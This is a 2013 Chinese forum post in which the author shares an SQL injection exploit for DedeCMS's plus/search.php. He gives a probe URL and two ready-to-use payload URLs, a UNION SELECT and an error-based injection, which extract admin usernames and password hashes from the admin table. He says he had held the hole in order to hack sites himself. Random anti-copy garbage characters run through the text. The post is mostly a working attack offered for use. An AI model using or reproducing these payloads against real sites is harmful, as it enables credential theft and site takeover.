转载不加作者名的没JJ* |. j2 U2 z6 X' a
! l, D8 C2 |$ X) k- b) Y1 {哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
- F) Y1 [. L7 e) r! W* \2 U
7 n0 P8 b; `( S- @# z% J T既然已经发出来了,我就把我自己搞的exp发下吧。。唉。5 |3 C0 `8 i/ K4 l9 l9 h: w5 {
* `8 E. n; D( a" `9 \我一般是这样测试的:
5 k) j& ?/ P0 G1 ^) J0 M' v5 j0 z. s' }, V% o4 Z
提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a
6 ?0 j9 K- B$ g0 G
6 m1 n& g5 j$ `转载不加作者名的没JJ
" K& J3 y" E3 k/ l6 ^+ w6 z- N6 ]7 `3 o) j% K# t
作者:鬼哥3 Y% c+ T3 A4 [" ~' w5 }
4 }% t& M [' d! W! }
o. p5 I- {: H7 g1 u& O3 N
% e l; E2 V. r& R! _看结果如果提示$ K; b5 z6 l0 f" I4 h- g
& @. s6 N2 u* ^
Safe Alert: Request Error step 2 !0 n1 Z$ q/ }, `2 L8 l
Y& j' ?1 W: X& | `, c" ?
那么直接用下面的exp- ~. f% r+ c6 a; {
# U4 ?$ L1 o( y9 b* Uxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a' k, E1 Q: [. S
0 ]3 ^" T, [, O" t
- z- M6 R7 J: X8 p9 a看结果如果提示
+ b+ I/ O: w, |7 R$ C) W" N/ C! \# C% C* g: S' B3 s; K, Y
Safe Alert: Request Error step 1 !' X9 g4 ?6 [6 R+ V9 ~$ D
$ p/ ^! n* N$ V那么直接用下面的exp
: z; a. p( A2 r2 v
! G9 m+ r0 @9 t# C6 y& Rxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a# H; r; h& L' J: q
4 G* S, M; ^# C( q( f4 w0 @0 F
2 v. T/ `' J# A- g5 k如果正常显示证明漏洞不存在了。
5 n" ^- l2 U5 B% [0 V9 y
7 c, h' V7 q1 h' f% t( w转载不加作者名的没JJ |
发表于 2013-1-21 08:45:22
收藏
支持
反对